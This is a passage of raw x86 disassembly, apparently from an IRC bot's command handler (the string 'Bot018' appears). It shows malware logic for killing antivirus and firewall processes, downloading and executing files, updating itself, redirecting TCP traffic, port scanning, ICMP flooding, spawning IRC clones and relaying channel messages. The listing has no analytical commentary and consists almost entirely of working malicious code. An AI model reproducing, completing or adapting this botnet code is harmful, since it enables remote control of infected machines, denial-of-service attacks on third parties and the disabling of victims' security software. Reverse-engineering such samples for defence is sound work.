loc_40959F: ; CODE XREF: sub_4078FA+1C99�j
push 6
mov edi, edx
mov esi, offset aShare ; "share"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_409623
cmp [ebp+var_10], eax
jz short loc_4095EF
cmp [ebp+var_448], al
jz short loc_4095C4
push eax
push [ebp+var_10]
push 1
jmp short loc_4095D0
; ---------------------------------------------------------------------------
loc_4095C4: ; CODE XREF: sub_4078FA+1CC0�j
push [ebp+ebx+var_98]
push [ebp+var_10]
push 0
loc_4095D0: ; CODE XREF: sub_4078FA+1CC8�j
call sub_406702
push eax
lea eax, [ebp+var_2E0]
push offset aS_1 ; "%s"
push eax
call sub_412BB5
add esp, 18h
jmp loc_40AE14
; ---------------------------------------------------------------------------
loc_4095EF: ; CODE XREF: sub_4078FA+1CB8�j
push 0
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4067C0
add esp, 10h
test eax, eax
lea eax, [ebp+var_2E0]
jz short loc_409619
push offset aNetShareListCo ; "[NET]: Share list completed."
jmp loc_40AE0C
; ---------------------------------------------------------------------------
loc_409619: ; CODE XREF: sub_4078FA+1D13�j
push offset aNetShareListFa ; "[NET]: Share list failed."
jmp loc_40AE0C
; ---------------------------------------------------------------------------
loc_409623: ; CODE XREF: sub_4078FA+1CB3�j
push 5
mov edi, edx
mov esi, offset aUser ; "user"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_4096C5
cmp [ebp+var_10], eax
jz short loc_409691
cmp [ebp+var_448], al
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
jz short loc_409658
push eax
push [ebp+var_10]
push 1
jmp short loc_409672
; ---------------------------------------------------------------------------
loc_409658: ; CODE XREF: sub_4078FA+1D54�j
mov ebx, [ebp+ebx+var_98]
test ebx, ebx
jz short loc_40966B
push ebx
push [ebp+var_10]
push 0
jmp short loc_409672
; ---------------------------------------------------------------------------
loc_40966B: ; CODE XREF: sub_4078FA+1D67�j
push 0
push [ebp+var_10]
push 2
loc_409672: ; CODE XREF: sub_4078FA+1D5C�j
; sub_4078FA+1D6F�j
call sub_4068DF
push eax
lea eax, [ebp+var_2E0]
push offset aS_1 ; "%s"
push eax
call sub_412BB5
add esp, 24h
jmp loc_40AE14
; ---------------------------------------------------------------------------
loc_409691: ; CODE XREF: sub_4078FA+1D40�j
push 0
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4069A9
add esp, 10h
test eax, eax
lea eax, [ebp+var_2E0]
jz short loc_4096BB
push offset aNetUserListCom ; "[NET]: User list completed."
jmp loc_40AE0C
; ---------------------------------------------------------------------------
loc_4096BB: ; CODE XREF: sub_4078FA+1DB5�j
push offset aNetUserListFai ; "[NET]: User list failed."
jmp loc_40AE0C
; ---------------------------------------------------------------------------
loc_4096C5: ; CODE XREF: sub_4078FA+1D37�j
push 5
mov edi, edx
mov esi, offset aSend ; "send"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40970F
cmp [ebp+var_10], eax
jz short loc_409708
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4065CE
push eax
lea eax, [ebp+var_2E0]
push offset aS_1 ; "%s"
push eax
call sub_412BB5
add esp, 1Ch
jmp loc_40AE14
; ---------------------------------------------------------------------------
loc_409708: ; CODE XREF: sub_4078FA+1DDE�j
push offset aNetNoMessageSp ; "[NET]: No message specified."
jmp short loc_409714
; ---------------------------------------------------------------------------
loc_40970F: ; CODE XREF: sub_4078FA+1DD9�j
push offset aNetCommandUnkn ; "[NET]: Command unknown."
loc_409714: ; CODE XREF: sub_4078FA+1BA7�j
; sub_4078FA+1E13�j
lea eax, [ebp+var_2E0]
jmp loc_40AE0C
; ---------------------------------------------------------------------------
loc_40971F: ; CODE XREF: sub_4078FA+1B8A�j
push 8
mov edi, eax
mov esi, offset aGethost ; "gethost"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40ABFB
push 3
mov edi, eax
mov esi, offset aGh ; "gh"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40ABFB
push 0Bh
mov edi, eax
mov esi, offset aAvfwkiller ; "avfwkiller"
pop ecx
xor edx, edx
repe cmpsb
jnz loc_40984D
mov edi, [ebp+var_8]
push 6
mov esi, offset aStart ; "start"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_409820
lea eax, [ebp+var_2E0]
push offset aAvfwAvFwBotKil ; "[AVFW]: AV/FW/BOT Killer active."
push eax
call sub_412BB5
push [ebp+ebx+var_9C]
xor edi, edi
push 1
push offset aKillerThread ; "Killer Thread"
push offset aAvfw ; "[AVFW]"
push 1
push edi
push [ebp+var_9C]
push [ebp+arg_4]
call sub_411120
push edi
lea eax, [ebp+var_2E0]
push 1
push eax
call sub_410EEA
add esp, 34h
mov esi, eax
lea eax, [ebp+var_18]
push eax
push edi
push edi
push offset sub_4074FD
push edi
push edi
call ds:dword_41F00C ; CreateThread
imul esi, 234h
cmp eax, edi
mov dword_43434C[esi], eax
jnz short loc_4097F9
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2E0]
push offset aAvfwFailedToSt ; "[AVFW]: Failed to start AV/FW killer th"...
push eax
call sub_412BB5
add esp, 0Ch
loc_4097F9: ; CODE XREF: sub_4078FA+1EE2�j
lea eax, [ebp+var_2E0]
push eax
call sub_401C33
cmp [ebp+var_C], edi
pop ecx
jnz loc_407B7B
push 0
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
jmp loc_40BC13
; ---------------------------------------------------------------------------
loc_409820: ; CODE XREF: sub_4078FA+1E70�j
mov edi, [ebp+var_8]
push 5
mov esi, offset aStop ; "stop"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_407B7B
push [ebp+ebx+var_9C]
push 1
push offset aKillerThread ; "Killer Thread"
push offset aAvfw ; "[AVFW]"
jmp loc_40C14E
; ---------------------------------------------------------------------------
loc_40984D: ; CODE XREF: sub_4078FA+1E5B�j
mov ecx, [ebp+ebx+var_9C]
test ecx, ecx
mov [ebp+var_10], ecx
jz loc_407B7B
push 9
mov edi, eax
mov esi, offset aAddalias ; "addalias"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AB88
push 3
mov edi, eax
mov esi, offset aAa ; "aa"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AB88
push 8
mov edi, eax
mov esi, offset aPrivmsg_0 ; "privmsg"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AB1D
push 3
mov edi, eax
mov esi, offset aPm_0 ; "pm"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AB1D
push 7
mov edi, eax
mov esi, offset aAction ; "action"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AA9A
push 2
mov edi, eax
mov esi, offset aA_1 ; "a"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AA9A
push 6
mov edi, eax
mov esi, offset aCycle ; "cycle"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AA34
push 3
mov edi, eax
mov esi, offset aCy ; "cy"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AA34
push 5
mov edi, eax
mov esi, offset aMode ; "mode"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A9FA
push 2
mov edi, eax
mov esi, offset aM ; "m"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A9FA
push 6
mov edi, eax
mov esi, offset aC_raw ; "c_raw"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A98B
push 4
mov edi, eax
mov esi, offset aC_r ; "c_r"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A98B
push 7
mov edi, eax
mov esi, offset aC_mode ; "c_mode"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A905
push 4
mov edi, eax
mov esi, offset aC_m ; "c_m"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A905
push 7
mov edi, eax
mov esi, offset aC_nick ; "c_nick"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A894
push 4
mov edi, eax
mov esi, offset aC_n ; "c_n"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A894
push 7
mov edi, eax
mov esi, offset aC_join ; "c_join"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A86C
push 4
mov edi, eax
mov esi, offset aC_j ; "c_j"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A86C
push 7
mov edi, eax
mov esi, offset aC_part ; "c_part"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A806
push 4
mov edi, eax
mov esi, offset aC_p ; "c_p"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A806
push 7
mov edi, eax
mov esi, offset aRepeat ; "repeat"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A742
push 3
mov edi, eax
mov esi, offset aRp ; "rp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A742
push 6
mov edi, eax
mov esi, offset aDelay ; "delay"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A6A5
push 3
mov edi, eax
mov esi, offset aDe ; "de"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A6A5
push 7
mov edi, eax
mov esi, offset aUpdate ; "update"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A4CE
push 3
mov edi, eax
mov esi, offset aUp ; "up"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A4CE
push 8
mov edi, eax
mov esi, offset aExecute ; "execute"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A42B
push 2
mov edi, eax
mov esi, offset aE ; "e"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A42B
push 7
mov edi, eax
mov esi, offset aRename ; "rename"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A3D3
push 3
mov edi, eax
mov esi, offset aMv ; "mv"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A3D3
push 0Ah
mov edi, eax
mov esi, offset aIcmpflood ; "icmpflood"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A2AF
push 5
mov edi, eax
mov esi, offset aIcmp ; "icmp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A2AF
mov ecx, [ebp+ebx+var_98]
test ecx, ecx
mov [ebp+arg_0], ecx
jz loc_407B7B
push 6
mov edi, eax
mov esi, offset aClone_0 ; "clone"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A1C1
push 2
mov edi, eax
mov esi, offset aC ; "c"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A1C1
push 9
mov edi, eax
mov esi, offset aDownload ; "download"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A044
push 3
mov edi, eax
mov esi, offset aDl ; "dl"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A044
push 9
mov edi, eax
mov esi, offset aRedirect ; "redirect"
pop ecx
xor edx, edx
repe cmpsb
jz loc_409F22
push 3
mov edi, eax
mov esi, offset aRd ; "rd"
pop ecx
xor edx, edx
repe cmpsb
jz loc_409F22
push 5
mov edi, eax
mov esi, offset aScan ; "scan"
pop ecx
xor edx, edx
repe cmpsb
jz loc_409E07
push 3
mov edi, eax
mov esi, offset aSc ; "sc"
pop ecx
xor edx, edx
repe cmpsb
jz loc_409E07
push 0Ah
mov edi, eax
mov esi, offset aC_privmsg ; "c_privmsg"
pop ecx
xor edx, edx
repe cmpsb
jz loc_409D11
push 5
mov edi, eax
mov esi, offset aC_pm ; "c_pm"
pop ecx
xor edx, edx
repe cmpsb
jz loc_409D11
push 9
mov edi, eax
mov esi, offset aC_action ; "c_action"
pop ecx
xor edx, edx
repe cmpsb
jz short loc_409BDD
push 4
mov edi, eax
mov esi, offset dword_425A64
pop ecx
xor edx, edx
repe cmpsb
jnz loc_408D7C
loc_409BDD: ; CODE XREF: sub_4078FA+22CD�j
push [ebp+var_8]
call sub_412F42
imul eax, 234h
cmp byte_434350[eax], 0
pop ecx
jz loc_40CFE2
mov edi, [ebp+var_14]
test edi, edi
jz loc_40CFE2
mov eax, [ebp+var_20]
lea edx, [eax+1]
loc_409C0A: ; CODE XREF: sub_4078FA+2315�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_409C0A
sub eax, edx
mov ebx, eax
mov eax, [ebp+var_8]
lea ecx, [eax+1]
loc_409C1B: ; CODE XREF: sub_4078FA+2326�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_409C1B
sub eax, ecx
mov ecx, eax
mov eax, [ebp+var_10]
lea esi, [eax+1]
loc_409C2C: ; CODE XREF: sub_4078FA+2337�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_409C2C
push [ebp+arg_0]
sub eax, esi
add eax, ecx
add eax, ebx
lea eax, [eax+edi+2]
push eax
call sub_413920
mov esi, eax
push esi
lea eax, [ebp+var_2E0]
push offset dword_425A58
push eax
call sub_412BB5
add esp, 14h
test esi, esi
jz loc_40CFE2
mov edi, [ebp+var_8]
push edi
call sub_412F42
test eax, eax
pop ecx
jle loc_40CFE2
push edi
call sub_412F42
cmp eax, 1F4h
pop ecx
jge loc_40CFE2
xor ebx, ebx
push ebx
push ebx
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_10]
push edi
call sub_412F42
imul eax, 234h
pop ecx
push dword_434344[eax]
call sub_4045DD
push edi
call sub_412F42
imul eax, 234h
add esp, 18h
cmp byte ptr dword_434138[eax], 73h
jnz loc_40CFE2
push esi
push edi
call sub_412F42
imul eax, 234h
pop ecx
add eax, offset byte_434350
push eax
push [ebp+var_10]
push offset aSSS_2 ; "[%s] * %s %s"
loc_409CE7: ; CODE XREF: sub_4078FA+2508�j
lea eax, [ebp+var_2E0]
push eax
call sub_412BB5
push ebx
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
jmp loc_40BBEB
; ---------------------------------------------------------------------------
loc_409D11: ; CODE XREF: sub_4078FA+22A5�j
; sub_4078FA+22B9�j
push [ebp+var_8]
call sub_412F42
imul eax, 234h
cmp byte_434350[eax], 0
pop ecx
jz loc_40CFE2
mov edi, [ebp+var_14]
test edi, edi
jz loc_40CFE2
mov eax, [ebp+var_20]
lea edx, [eax+1]
loc_409D3E: ; CODE XREF: sub_4078FA+2449�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_409D3E
sub eax, edx
mov ebx, eax
mov eax, [ebp+var_8]
lea ecx, [eax+1]
loc_409D4F: ; CODE XREF: sub_4078FA+245A�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_409D4F
sub eax, ecx
mov ecx, eax
mov eax, [ebp+var_10]
lea esi, [eax+1]
loc_409D60: ; CODE XREF: sub_4078FA+246B�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_409D60
push [ebp+arg_0]
sub eax, esi
add eax, ecx
add eax, ebx
lea eax, [eax+edi+2]
push eax
call sub_413920
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz loc_40CFE2
mov edi, [ebp+var_8]
push edi
call sub_412F42
test eax, eax
pop ecx
jle loc_40CFE2
push edi
call sub_412F42
cmp eax, 1F4h
pop ecx
jge loc_40CFE2
xor ebx, ebx
push ebx
push ebx
push esi
push [ebp+var_10]
push edi
call sub_412F42
imul eax, 234h
pop ecx
push dword_434344[eax]
call sub_4045DD
push edi
call sub_412F42
imul eax, 234h
add esp, 18h
cmp byte ptr dword_434138[eax], 73h
jnz loc_40CFE2
push esi
push edi
call sub_412F42
imul eax, 234h
pop ecx
add eax, offset byte_434350
push eax
push [ebp+var_10]
push offset aSSS_1 ; "[%s] <%s> %s"
jmp loc_409CE7
; ---------------------------------------------------------------------------
loc_409E07: ; CODE XREF: sub_4078FA+227D�j
; sub_4078FA+2291�j
push [ebp+var_8]
call dword_433514 ; inet_addr
push [ebp+var_10]
mov [ebp+var_2F8], eax
call sub_412F42
push [ebp+arg_0]
mov [ebp+var_304], eax
call sub_412F42
mov edi, [ebp+arg_4]
push 7Fh
push [ebp+var_9C]
mov [ebp+var_300], eax
lea eax, [ebp+var_384]
push eax
mov [ebp+var_388], edi
call sub_412C40
mov eax, [ebp+var_C]
mov ebx, [ebp+var_4]
add esp, 14h
push [ebp+var_300]
mov [ebp+var_2F0], ebx
push [ebp+var_304]
mov [ebp+var_2EC], eax
push [ebp+var_2F8]
call dword_433520 ; inet_ntoa
push eax
lea eax, [ebp+var_2E0]
push offset aScanPortScanSt ; "[SCAN]: Port scan started: %s:%d with d"...
push eax
call sub_412BB5
xor esi, esi
push esi
lea eax, [ebp+var_2E0]
push 9
push eax
call sub_410EEA
add esp, 20h
mov [ebp+var_2FC], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_388]
push eax
push offset sub_40E8FF
push esi
push esi
call ds:dword_41F00C ; CreateThread
mov ecx, [ebp+var_2FC]
imul ecx, 234h
cmp eax, esi
mov dword_43434C[ecx], eax
jnz short loc_409F18
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2E0]
push offset aScanFailedTo_0 ; "[SCAN]: Failed to start scan thread, er"...
push eax
call sub_412BB5
add esp, 0Ch
loc_409EF2: ; CODE XREF: sub_4078FA+2626�j
cmp [ebp+var_C], esi
jnz loc_40C4A1
push esi
push ebx
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push edi
jmp loc_40C499
; ---------------------------------------------------------------------------
loc_409F10: ; CODE XREF: sub_4078FA+2624�j
push 32h
call ds:dword_41F000 ; Sleep
loc_409F18: ; CODE XREF: sub_4078FA+25DB�j
cmp [ebp+var_2E8], esi
jz short loc_409F10
jmp short loc_409EF2
; ---------------------------------------------------------------------------
loc_409F22: ; CODE XREF: sub_4078FA+2255�j
; sub_4078FA+2269�j
push [ebp+var_8]
call sub_412F42
push 7Fh
push [ebp+var_10]
mov [ebp+var_FD0], eax
lea eax, [ebp+var_10D4]
push eax
call sub_412C40
push [ebp+arg_0]
call sub_412F42
push [ebp+var_9C]
mov esi, [ebp+arg_4]
mov [ebp+var_FD4], eax
lea eax, [ebp+var_1054]
push 80h
push eax
mov [ebp+var_10DC], esi
call sub_412E0D
mov eax, [ebp+var_C]
mov ebx, [ebp+var_4]
add esp, 20h
push [ebp+var_FD4]
mov [ebp+var_FC0], eax
lea eax, [ebp+var_10D4]
push eax
push [ebp+var_FD0]
mov [ebp+var_FC4], ebx
push esi
call sub_406C33
pop ecx
push eax
lea eax, [ebp+var_2E0]
push offset aRedirectTcpRed ; "[REDIRECT]: TCP redirect created from: "...
push eax
call sub_412BB5
xor edi, edi
push edi
lea eax, [ebp+var_2E0]
push 11h
push eax
call sub_410EEA
add esp, 24h
mov [ebp+var_FCC], eax
lea eax, [ebp+var_18]
push eax
push edi
lea eax, [ebp+var_10DC]
push eax
push offset sub_40D9BC
push edi
push edi
call ds:dword_41F00C ; CreateThread
mov ecx, [ebp+var_FCC]
imul ecx, 234h
cmp eax, edi
mov dword_43434C[ecx], eax
jnz short loc_40A03A
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
push offset aRedirectFailed ; "[REDIRECT]: Failed to start redirection"...
loc_40A005: ; CODE XREF: sub_4078FA+28AD�j
; sub_4078FA+3FD1�j ...
lea eax, [ebp+var_2E0]
push eax
call sub_412BB5
add esp, 0Ch
loc_40A014: ; CODE XREF: sub_4078FA+2748�j
; sub_4078FA+28C2�j ...
cmp [ebp+var_C], edi
jnz loc_40C4A1
push edi
push ebx
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push esi
jmp loc_40C499
; ---------------------------------------------------------------------------
loc_40A032: ; CODE XREF: sub_4078FA+2746�j
push 32h
call ds:dword_41F000 ; Sleep
loc_40A03A: ; CODE XREF: sub_4078FA+26FD�j
cmp [ebp+var_FBC], edi
jz short loc_40A032
jmp short loc_40A014
; ---------------------------------------------------------------------------
loc_40A044: ; CODE XREF: sub_4078FA+222D�j
; sub_4078FA+2241�j
mov esi, 0FFh
push esi
push [ebp+var_8]
lea eax, [ebp+var_F28]
push eax
call sub_412C40
push [ebp+arg_0]
xor edi, edi
mov [ebp+var_C24], edi
call sub_412F42
mov [ebp+var_C20], eax
mov eax, [ebp+ebx+var_94]
add esp, 10h
cmp eax, edi
jz short loc_40A091
push 10h
push edi
push eax
call sub_413809
add esp, 0Ch
mov [ebp+var_C18], eax
jmp short loc_40A097
; ---------------------------------------------------------------------------
loc_40A091: ; CODE XREF: sub_4078FA+2781�j
mov [ebp+var_C18], edi
loc_40A097: ; CODE XREF: sub_4078FA+2795�j
mov ebx, [ebp+ebx+var_90]
cmp ebx, edi
jz short loc_40A0B1
push ebx
call sub_412F42
pop ecx
mov [ebp+var_C1C], eax
jmp short loc_40A0B7
; ---------------------------------------------------------------------------
loc_40A0B1: ; CODE XREF: sub_4078FA+27A6�j
mov [ebp+var_C1C], edi
loc_40A0B7: ; CODE XREF: sub_4078FA+27B5�j
push 3Fh
push [ebp+var_10]
call sub_413F30
mov ebx, eax
cmp ebx, edi
pop ecx
pop ecx
jz short loc_40A0F1
and byte ptr [ebx], 0
inc ebx
loc_40A0CD: ; CODE XREF: sub_4078FA+27E4�j
push 26h
push ebx
call sub_413F30
cmp eax, edi
pop ecx
pop ecx
jz short loc_40A0E0
mov byte ptr [eax], 20h
jmp short loc_40A0CD
; ---------------------------------------------------------------------------
loc_40A0E0: ; CODE XREF: sub_4078FA+27DF�j
push esi
lea eax, [ebp+var_D28]
push ebx
push eax
call sub_412C40
add esp, 0Ch
loc_40A0F1: ; CODE XREF: sub_4078FA+27CD�j
push esi
push [ebp+var_10]
lea eax, [ebp+var_E28]
push eax
call sub_412C40
movzx eax, [ebp+var_447]
mov esi, [ebp+arg_4]
push 7Fh
push [ebp+var_9C]
mov [ebp+var_C14], eax
lea eax, [ebp+var_FA8]
push eax
mov [ebp+var_FAC], esi
call sub_412C40
push [ebp+var_10]
mov eax, [ebp+var_C]
push [ebp+var_8]
mov ebx, [ebp+var_4]
mov [ebp+var_C10], eax
lea eax, [ebp+var_2E0]
push offset aDownloadDown_1 ; "[DOWNLOAD]: Downloading URL: %s to: %s."...
push eax
mov [ebp+var_C0C], ebx
call sub_412BB5
push esi
lea eax, [ebp+var_2E0]
push 16h
push eax
call sub_410EEA
add esp, 34h
mov [ebp+var_C28], eax
lea eax, [ebp+var_18]
push eax
push edi
lea eax, [ebp+var_FAC]
push eax
push offset sub_401F06
push edi
push edi
call ds:dword_41F00C ; CreateThread
mov ecx, [ebp+var_C28]
imul ecx, 234h
cmp eax, edi
mov dword_43434C[ecx], eax
jnz short loc_40A1B4
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
push offset aDownloadFailed ; "[DOWNLOAD]: Failed to start transfer th"...
jmp loc_40A005
; ---------------------------------------------------------------------------
loc_40A1AC: ; CODE XREF: sub_4078FA+28C0�j
push 32h
call ds:dword_41F000 ; Sleep
loc_40A1B4: ; CODE XREF: sub_4078FA+289F�j
cmp [ebp+var_C08], edi
jz short loc_40A1AC
jmp loc_40A014
; ---------------------------------------------------------------------------
loc_40A1C1: ; CODE XREF: sub_4078FA+2205�j
; sub_4078FA+2219�j
push 7Fh
push [ebp+var_8]
lea eax, [ebp+var_123C]
push eax
call sub_412C40
push [ebp+var_10]
call sub_412F42
push 3Fh
push [ebp+arg_0]
mov [ebp+var_10EC], eax
lea eax, [ebp+var_11BC]
push eax
call sub_412C40
mov ebx, [ebp+ebx+var_94]
xor esi, esi
add esp, 1Ch
cmp ebx, esi
jz short loc_40A213
push 3Fh
lea eax, [ebp+var_117C]
push ebx
push eax
call sub_412C40
add esp, 0Ch
loc_40A213: ; CODE XREF: sub_4078FA+2905�j
lea eax, [ebp+var_11BC]
push eax
push [ebp+var_10EC]
lea eax, [ebp+var_123C]
push eax
lea eax, [ebp+var_2E0]
push offset aClonesCreatedO ; "[CLONES]: Created on %s:%d, in channel "...
push eax
mov [ebp+var_10E8], 1
call sub_412BB5
push esi
lea eax, [ebp+var_2E0]
push 18h
push eax
call sub_410EEA
add esp, 20h
mov [ebp+var_10E4], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_1240]
push eax
push offset sub_40779B
push esi
push esi
call ds:dword_41F00C ; CreateThread
mov ecx, [ebp+var_10E4]
imul ecx, 234h
cmp eax, esi
mov dword_43434C[ecx], eax
jnz short loc_40A2A2
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
push offset aClonesFailedTo ; "[CLONES]: Failed to start clone thread,"...
jmp loc_40AF46
; ---------------------------------------------------------------------------
loc_40A29A: ; CODE XREF: sub_4078FA+29AE�j
push 32h
call ds:dword_41F000 ; Sleep
loc_40A2A2: ; CODE XREF: sub_4078FA+298D�j
cmp [ebp+var_10E0], esi
jz short loc_40A29A
jmp loc_40AF55
; ---------------------------------------------------------------------------
loc_40A2AF: ; CODE XREF: sub_4078FA+21CB�j
; sub_4078FA+21DF�j
push [ebp+var_10]
call sub_412F42
mov ebx, [ebp+arg_4]
xor edi, edi
cmp eax, edi
pop ecx
mov [ebp+var_1358], eax
jle loc_40A3AE
push [ebp+var_8]
mov esi, 80h
lea eax, [ebp+var_14E0]
push esi
push eax
call sub_412E0D
push [ebp+var_9C]
xor eax, eax
cmp [ebp+var_43A], al
push esi
setnz al
mov [ebp+var_14E4], ebx
mov [ebp+var_1354], eax
lea eax, [ebp+var_13E0]
push eax
call sub_412E0D
push [ebp+var_10]
mov eax, [ebp+var_4]
push [ebp+var_8]
mov [ebp+var_1350], eax
mov eax, [ebp+var_C]
push offset aIcmpFloodingSF ; "[ICMP]: Flooding: (%s) for %s seconds."
mov [ebp+var_134C], eax
lea eax, [ebp+var_2E0]
push 200h
push eax
call sub_412E0D
push edi
lea eax, [ebp+var_2E0]
push 0Eh
push eax
call sub_410EEA
add esp, 38h
mov [ebp+var_1360], eax
lea eax, [ebp+var_18]
push eax
push edi
lea eax, [ebp+var_14E4]
push eax
push offset sub_404249
push edi
push edi
call ds:dword_41F00C ; CreateThread
mov ecx, [ebp+var_1360]
imul ecx, 234h
cmp eax, edi
mov dword_43434C[ecx], eax
jnz short loc_40A3A4
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2E0]
push offset aIcmpFailedToSt ; "[ICMP]: Failed to start flood thread, e"...
push eax
call sub_412BB5
add esp, 0Ch
jmp short loc_40A3C1
; ---------------------------------------------------------------------------
loc_40A39C: ; CODE XREF: sub_4078FA+2AB0�j
push 32h
call ds:dword_41F000 ; Sleep
loc_40A3A4: ; CODE XREF: sub_4078FA+2A83�j
cmp [ebp+var_1348], edi
jz short loc_40A39C
jmp short loc_40A3C1
; ---------------------------------------------------------------------------
loc_40A3AE: ; CODE XREF: sub_4078FA+29CB�j
lea eax, [ebp+var_2E0]
push offset aIcmpInvalidFlo ; "[ICMP]: Invalid flood time must be grea"...
push eax
call sub_412BB5
pop ecx
pop ecx
loc_40A3C1: ; CODE XREF: sub_4078FA+2AA0�j
; sub_4078FA+2AB2�j
cmp [ebp+var_C], edi
jnz loc_40C4A1
push edi
push [ebp+var_4]
jmp loc_40CB44
; ---------------------------------------------------------------------------
loc_40A3D3: ; CODE XREF: sub_4078FA+21A3�j
; sub_4078FA+21B7�j
push [ebp+var_10]
push [ebp+var_8]
call ds:dword_41F0CC ; MoveFileA
test eax, eax
jz short loc_40A407
push [ebp+var_10]
lea eax, [ebp+var_2E0]
push [ebp+var_8]
push offset aFileRenameSToS ; "[FILE]: Rename: '%s' to: '%s'."
push 200h
push eax
call sub_412E0D
add esp, 14h
jmp loc_40C47E
; ---------------------------------------------------------------------------
loc_40A407: ; CODE XREF: sub_4078FA+2AE7�j
push offset aFile ; "[FILE]:"
call sub_405708
push eax
lea eax, [ebp+var_2E0]
push 200h
push eax
call sub_412E0D
add esp, 10h
jmp loc_40C47E
; ---------------------------------------------------------------------------
loc_40A42B: ; CODE XREF: sub_4078FA+217B�j
; sub_4078FA+218F�j
push 11h
pop ecx
push [ebp+var_8]
xor eax, eax
xor ebx, ebx
lea edi, [ebp+var_3F0]
rep stosd
inc ebx
xor esi, esi
mov [ebp+var_3F0], 44h
mov [ebp+var_3C4], ebx
mov word ptr [ebp+var_3C0], si
call sub_412F42
cmp eax, ebx
pop ecx
jnz short loc_40A46A
mov word ptr [ebp+var_3C0], 5
loc_40A46A: ; CODE XREF: sub_4078FA+2B65�j
cmp [ebp+var_14], esi
jz loc_40AF55
push [ebp+var_10]
push [ebp+var_14]
call sub_413920
mov edi, eax
cmp edi, esi
pop ecx
pop ecx
jz loc_40AF55
lea eax, [ebp+var_A64]
push eax
lea eax, [ebp+var_3F0]
push eax
push esi
push esi
push 30h
push ebx
push esi
push esi
push edi
push esi
call ds:dword_41F030 ; CreateProcessA
test eax, eax
lea eax, [ebp+var_2E0]
jnz short loc_40A4C3
push offset aExecCouldnTExe ; "[EXEC]: Couldn't execute file."
push eax
call sub_412BB5
pop ecx
pop ecx
jmp loc_40AF55
; ---------------------------------------------------------------------------
loc_40A4C3: ; CODE XREF: sub_4078FA+2BB5�j
push edi
push offset aExecCommandsS ; "[EXEC]: Commands: %s"
jmp loc_40AF4C
; ---------------------------------------------------------------------------
loc_40A4CE: ; CODE XREF: sub_4078FA+2153�j
; sub_4078FA+2167�j
mov edi, [ebp+var_10]
mov esi, offset aBot018 ; "Bot018"
loc_40A4D6: ; CODE XREF: sub_4078FA+2BF8�j
mov cl, [esi]
mov al, cl
cmp cl, [edi]
jnz short loc_40A4F8
test al, al
jz short loc_40A4F4
mov cl, [esi+1]
mov al, cl
cmp cl, [edi+1]
jnz short loc_40A4F8
inc esi
inc esi
inc edi
inc edi
test al, al
jnz short loc_40A4D6
loc_40A4F4: ; CODE XREF: sub_4078FA+2BE6�j
xor eax, eax
jmp short loc_40A4FD
; ---------------------------------------------------------------------------
